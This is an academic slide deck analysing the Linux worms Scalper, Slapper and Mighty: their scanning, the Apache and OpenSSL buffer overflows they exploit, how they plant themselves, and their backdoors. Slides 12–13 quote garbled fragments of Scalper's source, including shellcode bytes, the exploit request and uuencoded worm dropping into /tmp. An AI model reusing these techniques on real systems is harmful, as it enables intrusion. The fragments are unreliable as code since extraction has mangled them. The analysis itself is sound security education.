Linux Internet Worms

1
Linux Internet Worms
- Scalper, Slapper and Mighty

• Cheol-Min Hwang
• cmhwang_at_ecs.syr.edu

2
Contents

• Overviews
• Backgrounds
• Descriptions and Details
• Scalper Code Snippet
• Opinions
• References

3
Overview

• Scan target
• the range of random IP address
• Check vulnerability
• Send simple http request
• Attempt to exploit the vulnerability
• Plant worm
• Encode and upload source
• Decode, compile and execute
• CodeRed !!

4
Background

• 63 of the web sites are using Apache
• 2003.07 (Netcrafts Web server survey)
• Apache Vulnerability
• Buffer overflow via Chunk Encoded HTTP request
• OpenSSL Vulnerability
• Buffer overflow via large client master key or
  large session ID

5
Description (Scalper)

• Unix Worm
• Hard coded target scanning
• Apache chunked encoding vulnerability
• Backdoor functionality
• DDOS Attack
• Mass Emailing
• Downloading and Executing binary
• Port opening and Shell commanding
• Not prevalent in the wild
• Spotted on Honeypot

6
More (Scalper)

• Target Scan
• A.B.xxx.xxx
• Vulnerability Check
• Send GET / to port 80
• Send specially crafted buffer (Chuck encoding
  vulnerability)
• Worm Plant
• Send itself in UUENCODE form to /tmp
• Decode as /tmp/.a and run it
• Activate Back door component
• UDP port 2001
• Encrypted backdoor communication

7
Description (Slapper)

• Unix Worm
• OpenSSL vulnerability
• Peer-to-peer network creation
• Backdoor functionality
• DDOS Attack
• Mass Emailing
• Downloading and Executing binary
• System information gathering
• More than 3,500 infected system (Sep. 2002)

8
More (Slapper)

• Vulnerability Check
• send exploit code to port 443 (SSL service)
• Worm Plant
• Decode, Compile w/ gcc and Run
• (A) /tmp/.bugtraq
• (B) .cinik information gathering, Virus
• (C) .unlock ?httpd, update (binary name)

9
More (Slapper)
10
Description (Mighty)

• Unix Worm
• OpenSSL vulnerability
• Based on Slapper Slapper valiant
• IRC server connection
• Based on Age of Kaiten IRC bot
• Backdoor functionality
• DDOS attack
• Downloading and Executing binary
• Around 1,600 infected system (Oct. 2002)

11
More (Mighty)

• IRC Connection
• Connect to an IRC server in the UK
• Join a passworded channel
• Worm Plant
• devnull, k, sslx.c and script.sh in /tmp/.socket2
  directory
• Infection Mark
• /tmp/.god_you_make_me_laugh_canin-boy

12
Scalper Code Snippet (1)

• Source Code Available (C program 2,254 line)
• Target Scan
• else d
• sprintf(srv,"d.d.d.d",a,b,c,d)
• clientsn.exttime(NULL)
• atcp_sync_connect(clientsn,srv,SCANPORT)
• write(sock,"GET / HTTP/...",strlen("GET / ...
• Vulnerability Exploit
• char shellcode "\x68\x47\x47\x47\x47\x89
• PUT_STRING("POST / HTTP
• memcpy(p, shellcode, sizeof(shellcode) - 1)
• p sizeof(shellcode) - 1
• PUT_STRING("\r\n")

13
Scalper Code Snippet (2)

• Worm Plant
• if ((infopen("/tmp/.a","r")) NULL) return 0
• writem(a,"begin 655 .a\n")
• while ((n fread(buf, 1, 45, in)))
• writem(sock,"\nrm -rf /tmp/.acat gt /tmp/.uua ltlt
• sprintf(buf,"/usr/bin/uudecode -p /tmp/.uua gt
  /tmp/.a
• Backdoor
• if (udpserver.len ! 0) if (!audp_recv(udpserver,
  udpclient,buf,3000))
• struct header tmp(struct header )buf
• if (udpserver.len gt sizeof(struct header))
• switch(tmp-gttag)
• case 0x20 // Versione

14
Opinions

• Even though malicious code for Linux is not
  prosperous currently, the situation will not
  prolong.
• More Linux Users
• Linux Servers (Web, File, Application)
• Linux Applications (StarOffice, OpenOffice)
• Cross Compatible Virus (Winux, Etap)
• Open Nature
• Linux Misbelief (Safe box)

15
References

• Analysis
• SOPHOS
• Network Associates
• Symantec
• VirusList.com
• F-Secure
• Vulnerability
• Apacheweek.com
• httpd.apache.org
• cve.mitre.org
• First Apache Worm Uncovered (Source Code)
• http//dammit.lt/apache-worm/